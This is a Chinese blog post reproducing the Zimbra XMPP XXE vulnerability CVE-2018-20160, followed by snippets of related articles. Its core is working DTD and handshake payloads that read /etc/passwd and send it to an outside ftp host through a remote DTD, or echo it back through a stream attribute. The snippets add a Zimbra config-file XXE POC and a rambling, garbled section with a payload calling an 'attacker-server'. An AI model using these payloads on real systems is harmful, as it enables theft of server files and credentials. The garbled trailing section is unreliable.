Zimbra XMPP XXE 复现

最新推荐文章于 2023-10-13 12:33:40 发布
最新推荐文章于 2023-10-13 12:33:40 发布
阅读量4.9k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全 漏洞 Java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fnmsd/article/details/89295607
本文详细分析了Zimbra XMPP服务中的XXE漏洞CVE-2018-20160,介绍了环境搭建、漏洞触发及利用手法。通过对Zimbra-chat插件及XMPP协议的深入研究,展示了如何利用XXE漏洞读取服务器文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

周末没事,接着找CVE-2018-20160,XMPP的XXE

https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories

https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.9/P9

补丁上说XXE是zimbra-chat插件的漏洞,由于zimbra-chat插件是apt安装,所以如果管理员没事upgrade一下就修复了,而8.7.x的AutoDiscovers XXE是需要手工安装补丁的,相对会多一些。

顺便一说:其它XMPP协议估计搞法估计都差不多,大佬们有空可以多试试^_^

环境搭建

还是使用jorgedlcruz/zimbra这个docker作为基础,该docker使用8.7.11版本的安装包,所以需要进行一点修改。

使用start.sh的内容创建配置,但是安装使用该地址的安装包:

https://files.zimbra.com/downloads/8.8.9_GA/zcs-8.8.9_GA_3019.UBUNTU16_64.20180809160254.tgz

解压缩后需要删除包中utils/globals.sh,删除其中的zimbra-patch行,否则安装时会安装更新。

调用install.sh安装时,不能使用8.7.11的输入重定向。

由于zimbra-chat是apt安装,会自动安装最新版,所以最后还得给zimbra-chat插件降个级:

apt-get install zimbra-chat=2.0.1.1532356008-1.u16
su - zimbra
zmmailboxdctl restart

新旧代码对比:

新:

在这里插入图片描述

旧:

在这里插入图片描述

Zimbra-chat XMPP XXE

先看了半天Zimbra-chat代码,发现看解析流程实在太费劲了就改看XMPP协议了。

代码位置在/opt/zimbra/lib/openchat下面,有兴趣的师傅可以多跟跟。

具体连接流程可以下载一个Gajim,看其中的XML控制台。

在这里插入图片描述

说下个人理解:XMPP的协议基于XML,相当于C/S两端拼凑XML,你写一段我写一段,解析过程使用流式XML解析。但是具体的DOCTYPE定义、实体引用是XML发起人所规定。(emm,这段不确定对,仅供参考。)由于大部分操作都得走认证,没有账号的情况下除了首次握手以外也没啥好搞的了,下面说的都是基于首次握手做的。

流式XML解析的接口:

http://doc.codingdict.com/java_api/javax/xml/stream/XMLStreamReader.html

连接XMPP服务

openssl s_client -connect 192.168.252.139:5222 -starttls xmpp --debug

dtd:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://192.168.252.1/%payload;'>">
%param1;

发送报文(第一次握手报文):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "https://pastebin.com/raw/dtd233">
%remote;
%send;
]>
<stream:stream xmlns="jabber:client" version="1.0" xmlns:stream="http://etherx.jabber.org/streams" to="zimbra.io" xml:lang="zh" >

结果只有一行:

在这里插入图片描述
如果读localconfig.xml直接抛异常,就是原文作者说的ftp命令中的换行被java检测的问题。

emm,作者原文里提到了新版本的Java会抛掉多行命令,但是并不影响提到的几个CVE= =,这个节奏不对啊?

继续翻XMPP协议

经过查询,发现除了client to server这样的请求,还有server to server的:

https://xmpp.org/extensions/xep-0288.html

dtd:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY internal '%payload;'>">

走握手包,如果to的服务不存在,会将to的内容回显,也是在属性中:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root
[
<!ENTITY % remote SYSTEM "https://pastebin.com/raw/dtdurl">
%remote;
%param1;
]>
	<stream:stream xmlns:stream='http://etherx.jabber.org/streams'
               xmlns='jabber:server' xmlns:db='jabber:server:dialback'
               to='&internal;' from='zimbra.io'
               xml:lang='en' version='1.0'>

结果:
在这里插入图片描述

思考(懒得搞了的)

由于上面的操作走了XML的属性,所以是没法读带<和&(实体定义除外)文件的(比如localconfig.xml之类的)。

接着由于starttls操作的握手还没搞明白,所以登录以后的利用还没有搞。

但是看Gajim的数据流,starttls以后的stream还是由C端发起,可以设置Doctype,然后通过message发消息来读取XML文件(这个可以在Tag中),这个就请各位师傅自行研究了(板凳西瓜准备)。

参考资料

https://www.cnblogs.com/backlion/p/9302528.html

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf

https://staaldraad.github.io/2016/12/11/xxeftp/

https://gist.github.com/staaldraad/280f167f5cb49a80b4a3

CVE-2020-11107-XAMPP任意命令执行漏洞
战神/calmness的博客
10-30 2359
1、XAMPP简介 XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包。这个软件包原来的名字是 LAMPP,但是为了避免误解,最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris、Mac OS X 等多种操作系统下安装使用,支持多语言:英文、简体中文、繁体中文、韩文、俄文、日文等。XAMPP 的确非常容易安装和使用:只需下载,解压缩,启动即可。该软件和phpstudy类似。 2、漏洞成因 在windows下,XAMPP允许非管理
zimbra rce 漏洞复现
weixin_40709439的博客
05-12 7476
本地搭建了好久,虚拟机突然蹦了,。。。 上钟馗之眼和shodan找了个目标 第一步,利用了CVE-2019-9670 XXE漏洞来读取配置文件 Zimbra配置文件位置为/conf/localconfig.xml 根据《A Saga of Code Executions on Zimbra》RCE漏洞分析 https://blog.youkuaiyun.com/fnmsd/article/details/88...
XAMPP任意命令执行漏洞复现
玄道的网安博客
07-15 2847
前言 XAMPP是一个把Apache网页服务器与PHP、Perl及MariaDB集合在一起的安裝包,允许用戶可以在自己的电脑上轻易的建立网页服务器。 影响版本 Apache Friends XAMPP <7.2.29 Apache Friends XAMPP 7.3.*,<7.3.16 Apache Friends XAMPP 7.4.*,<7.4.4 环境搭建 下载地址:https://sourceforge.net/projects/xampp/files/XAMPP%2
zimbra_poc:Zimbra XXE + SSRF + UPC Poc
03-16
Zimbra POC 用法 需要自己在源代码中修改dtd_url为如下内容的dtd地址: <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start " <![CDATA[ "> <!ENTITY % end " ]]> "> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>"> 使用方法: python zimbra_poc.py https://target.com POC验证验证使用,不要用于非法用途。 参考资料
Zimbra 小于 8.8.11版本 XXE GetShell EXP.rar
05-08
Zimbra邮件系统<8.8.11 XXE SSRF远程代码执行漏洞GetShell 漏洞描述: 漏洞是利用XXE和ProxyServlet SSRF 漏洞拿到 admin authtoken 后,通过文件上传在服务端执行任意代码,威胁程度极高。当Zimbra服务端打来Memcached缓存服务是,可以利用SSRF攻击进行反序列化执行远程代码。不过由于Zimbra在单服务器安装中尽管Memcached虽然启动但是并没有进行使用,所以其攻击场景受到限制。 影响版本: ZimbraCollaboration Server 8.8.11 之前的版本都受到影响。具体来说: 1. Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。 2. Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
Linux系统安装配置Zimbra邮件服务器图文教程
05-06
介绍Linux系统安装配置Zimbra邮件服务器的步骤
Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现
部分学习记录
03-12 3235
炒冷饭复现:cve-2019-9670 xxe + cve-2019-9621 ssrf
Zimbra邮件服务器利用XXE漏洞与SSRF完成对目标的文件上传与远程代码执行
勤能补拙
04-06 7334
前言 原文地址:https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html 参考文档:https://blog.youkuaiyun.com/fnmsd/article/details/88657083 历史版本存在的RCE(远程代码执行)漏洞: CVE-2013-7091本地文件披露漏洞,影响范围为8.0.2以下版本...
Zimbra SSRF+Memcached+反序列化漏洞利用复现
fnmsd的博客
04-12 8841
前言 之前懒了一下,没复现memcached反序列化的部分。 在看本文之前请先看完上一篇复现: https://blog.youkuaiyun.com/fnmsd/article/details/88657083 本篇复现基于8.7.11进行复现,就是官网上直接下的。 纯技术研究,请勿使用在非法用途。 环境搭建 直接用docker,https://hub.docker.com/r/jorgedlcruz/zi...
zimbra+docker安装(方式一)
vanilla_he的博客
06-11 4040
基于【zimbra安装步骤】做docker,zimbra本身很大做成的镜像近2G,也可能是我没有找到好方法。以下是我做镜像的步骤: 一、准备 主机要能联网 1、安装docker docker尽量是稳定的新版本吧,下面是我的docker版本 # docker -v Docker version 18.09.5, build e8ff056 2、文件包准备 root@servern...
zimbra安装文档很详细
05-18
一、 Zimbra安装: 1. 确认sendmail、firewall与selinux服务已经禁止; a) 检测Sendmail状态:Service sendmail status; b) 检测Firewall状态:Service iptables status; c) 检测Selinux状态:setenforce 0;
zimbra:安装和配置Zimbra Collaboration Open Source Edition的角色
01-31
津布拉 在Red Hat,CentOS和Ubuntu Server上安装和配置Zimbra Collaboration Open Source Edition的非官方角色。 要求 2.9.6或更高。 安装 Zimbra已经在Ansible Galaxy中,因此只需在ansible-galaxy命令中在计算机中安装此脚本即可: ansible-galaxy install lucascbeyeler.zimbra 更新资料 发行新版本的ansible-zimbra时,您将需要再次运行安装过程,但要使用“ -f”或“ --force”参数。 ansible-galaxy install -f lucascbeyeler.zimbra 产品特点 运行许多次您想应用配置-仅当服务器未安装Zimbra时才会发生安装 配置SpamAssassin,Pyzor和Razor; 为服务器配置徽标-警告: ; 启用PolicyD服务和Web管理员; 代理管理员; HTTP到HTTPS重定向; 纯模式下的LMTP主机查找; 自定义您的Zimbra OSE服务器; 角色变量 主机名:在没有域
zimbra-ldap-docker
02-14
Zimbra与Docker中的LDAP(Ubuntu Bionic) 从加载 docker load < zimbra_docker.tar 部署 docker-compose up -d 运行容器 docker run -p 80:80 -p 10389:389 -p 7071:7071 -h zimbra.example.com --name zimbra --privileged -it zimbra-docker 存取容器 sudo docker exec -it zimbra bash Zimbra验证 访问 登录:管理员 密码:123456 LDAP认证(简单认证) 访问Apache DS 主机名:localhost 端口:10389 绑定DN:uid = zimbra,cn = admins,cn = zimbra 密码:123456
【漏洞复现】Openfire身份认证绕过漏洞到RCE(CVE-2023-32315)
TT小子的博客
09-19 173
1、简介 Openfire是一个基于XMPP协议的即时通讯服务器,也称之为即时通讯平台。在即时通讯中往往因为需要保存一些状态或者数据所以不能采用点对点通讯,而是需要搭建服务器来转发。Openfire的管理页面包含5个菜单选项,分别是服务器基本信息配置选项、用户组管理选项、会话管理选项、分组聊天选项和插件选项。 2、漏洞描述 Openfire的Web管理后台存在一处目录穿越漏洞,这将允许攻击者绕过...
Zimbra
zhoumouren88的博客
08-27 1340
第一步:利用XXE读取配置文件 这里利用了CVE-2019-9670漏洞来读取配置文件,你需要在自己的VPS服务器上放置一个dtd文件,并使该文件能够通过HTTP访问。为了演示,我在GitHub上创建了一个仓库,从GitHub上获取dtd文件。 上图中用红框圈起来的就是zimbra账号的密码,先记下来以后会用到。 dtd文件内容如下: 1 <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> 2 <!ENTITY...
xxe漏洞浅谈以及复现
weixin_51692662的博客
10-18 2063
xxe
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5605
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
XXE漏洞复现实操
wutiangui的博客
10-13 1041
(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞, XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据。(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞。如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
nginx代理openfire
化工厂的博客
01-05 2793
背景:现想在只开放一个端口号的前提下,利用nginx代理转发,访问到openfire的三个端口 准备工作:本地搭建openfire,nginx 启动openfire,访问127.0.0.1:9595,打开登录页面证明部署成功 openfire除了管理使用的9595端口外,还额外占用7070和5222两个端口(端口可以登录管理页面进行修改默认为9595、7070、5222) 1、第一次尝试:监听8001端口,配置三个upstream,指向不同的端口 http { include ...
xxe漏洞复现ssrf
最新发布
03-27
### XXE漏洞与SSRF的关系 XXE(XML External Entity)漏洞允许攻击者通过恶意构造的外部实体引用,读取服务器上的文件或其他资源。而SSRF(Server-Side Request Forgery)是一种让目标服务器发起请求到指定地址的安全问题。两者可以通过特定方式结合使用,在某些场景下实现更复杂的攻击效果。 例如,XXE可以和SSRF一起用于探测其他内网主机的信息,基于HTTP协议进行端口扫描或服务发现[^1]。这种组合能够使攻击范围扩大至内部网络中的更多资产。 --- ### Zimbra RCE漏洞背景及其利用关系 在一些复杂的应用程序中,多个安全缺陷可能相互关联形成更大的威胁模型。比如Zimbra远程代码执行漏洞(CVE-2019-9670),其完整的RCE链依赖于另一个SSRF漏洞(CVE-2019-9621)[^2]。尽管官方文档提到需要两个漏洞配合才能达成最终的目标——即完全控制受害者的机器;但实际上也有方法绕过此限制单独触发该功能模块从而直接获得shell权限的情况发生(具体细节未公开披露)。 这表明即使缺少明确标注出来的辅助条件也可能找到替代路径去完成整个攻击链条的设计意图之外的操作行为模式转换过程中的可能性探索方向之一就是寻找是否存在类似的逻辑错误或者配置不当之处作为突破口来进行尝试突破现有的防护机制进而达到预期目的的同时还应该考虑到实际环境中可能会遇到的各种阻碍因素影响最终成功率高低程度不同而已。 --- ### 复现步骤概述 为了验证上述理论假设成立与否并通过实践检验得出结论证明观点正确无误的话,则需按照如下方式进行操作: #### 准备工作 1. **环境搭建**: 使用虚拟机创建隔离测试环境,安装易受攻击版本的服务软件实例。 2. **工具准备**: 下载并启动Burp Suite社区版用作中间拦截器角色以便后续手动调整数据包内容后再转发出去供进一步分析研究之用。 #### 实际演练部分 ##### 设置代理连接 在浏览器里设定好相应的出口通道指向本地监听端口号之后加载含有潜在风险点位链接地址页面时自动将所有通信流量导向我们事先布置好的陷阱装置等待捕捉感兴趣的数据片段回来审查是否有异常现象出现值得深入挖掘下去的价值所在之处存在即可视为成功捕获有效样本素材可供下一步骤处理使用前先保存原始状态副本留档备案以防万一丢失重要线索证据材料造成无法挽回的局面后果严重必须谨慎对待每一个环节都不能马虎大意才行啊同志们加油干吧! ```plaintext GET /vuln/xxetest.php HTTP/1.1 Host: target-site.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` ##### 构造Payload 接着把刚才截获下来的未经修改过的原样复制粘贴过来放到重复发送窗口里面替换掉原有的参数字段值换成精心设计制作而成的新颖独特而又充满危险性的特殊字符序列结构形式表现出来看看会发生什么有趣的事情呢?让我们拭目以待吧朋友们! ```xml <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test[ <!ENTITY % remote SYSTEM "http://attacker-server/payload.dtd"> <!ENTITY % init "<!ENTITY % send SYSTEM 'file:///etc/passwd'>"> ]> <reset> <login>admin;%send;</login> <secret>Any bugs?</secret> </reset> ``` 注意这里引入了一个外部DTD定义文件`payload.dtd`,它包含了更多的指令用来指示解析引擎如何去构建新的实体标签嵌套层次关系直到最后一步才真正暴露核心秘密武器位置信息泄露给外界观察员看到为止才算圆满完成任务使命结束啦哈哈哈哈哈!!! --- ### 结果评估标准说明 当以上所有的准备工作都顺利完成以后就可以静候佳音传来好消息咯~ 如果一切正常顺利的话那么你应该能够在自己的监控屏幕上清晰地看见来自受害者那边传来的回应消息当中携带了原本不应该被轻易获取得到的秘密情报资料比如说操作系统用户名列表之类的敏感隐私类别的东西就充分证明我们的实验取得了圆满的成功成果喜人呀各位小伙伴们快来庆祝一番吧😊🎉👏 当然啦除了单纯追求技术层面的乐趣体验之外更重要的是要从中吸取教训总结经验不断提高自身的网络安全意识水平时刻保持警惕防止自己成为下一个倒霉蛋哦记住一句话叫做“道高一尺魔高一丈”永远不要低估敌人可能拥有的强大实力好吗谢谢大家听我说完这些话希望对你们有所帮助再见👋~ ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值